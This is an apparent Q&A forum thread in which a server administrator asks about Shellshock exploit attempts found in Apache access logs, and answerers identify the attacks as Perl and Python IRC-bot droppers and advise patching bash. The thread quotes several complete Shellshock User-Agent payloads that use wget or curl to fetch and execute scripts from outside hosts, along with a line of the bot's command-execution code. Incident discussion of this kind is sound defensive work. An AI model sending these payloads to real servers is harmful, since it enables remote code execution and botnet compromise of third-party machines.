1

I saw the following line under /var/log/apache2/access_log:

"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

I had not gotten around to patching bash yet. I shutdown the machine immediately.

Has anyone seen this on their logs and/or examined the Perl script found at http://213.5.67.223/jurat? It seems fairly benign, but I want to know how worried I should be?

On line 338 you can see the shell function executes a shell command that was fetched from someone on the other end of an IRC channel

my @resp=`$comando 2>&1 3>&1`;

This is executed with the same user level as the apache server. I just hope they were not able to escalate privileges.

wcochran
  • 10,089
  • 6
  • 61
  • 69
  • There is another discussion on this script-kiddie attempt [here][1] [1]: http://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock – Arul Selvan Oct 04 '14 at 14:25
  • See another thread on this here: http://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock – Arul Selvan Oct 04 '14 at 14:27

3 Answers3

2

I haven't looked at the details, but it doesn't look benign to me:

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");

This looks to me like some kind of botnet script. Scary. Get patched up, people.

UPDATE: The analysis in this blog:

If the script is successfully executed then the infected host will connect to an IRC channel hard coded in the script and wait for commands."

That's badder than Baddy McBad.

chiastic-security
  • 20,430
  • 4
  • 39
  • 67
  • It certainly looks scary, but it doesn't look like it changed the state of the machine (e.g. installed a root kit). I am hoping I don't need to do a reinstall. – wcochran Sep 27 '14 at 21:09
  • Probably not... but if it really did connect to the IRC channel and wait for commands, it's anyone's guess as to what those commands were. You could get some confidence by using `find` to look for any changed files in the last 24h. – chiastic-security Sep 27 '14 at 21:10
  • Yes -- I see in the `shell` function that a shell command is exec'ed that was retrieved from the IRC user. McBad indeed. At least its not run as root?!? – wcochran Sep 27 '14 at 22:08
1

I've had such lines in my access_log, but some were slightly different:

""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

=> now you can download it and you will obtain the vilain perl script: http://pastie.org/9604492

nice example of another IRC bot exploit :) hope that helps

scavenger
  • 414
  • 4
  • 10
  • It is kind of interesting to read these scripts. Too bad these folks can use their knowledge for good. – wcochran Oct 05 '14 at 22:16
1

See link on similar thread: https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock

This is a script-kiddie attempt to exploit the bash vulnerability to execute a perl script based IRC bot. If you have bash updated, and in addition, if you run apache under chroot like I do, you have nothing to worry about. I see several versions of this on my log (see below) at least every other day since 9/27...this is just a noise.

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

Another variety of script (python script) execution attempt I just noticed today ... NOTE: google-traffic-analytics.com where the python script is downloaded has nothing to do w/ Google of course.

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
Community
  • 1
  • 1
Arul Selvan
  • 121
  • 3
  • Thanks. I've since patched bash and no damage was done. My machines are always under some sort of attack. Evil is always busy on the internet. – wcochran Oct 05 '14 at 22:15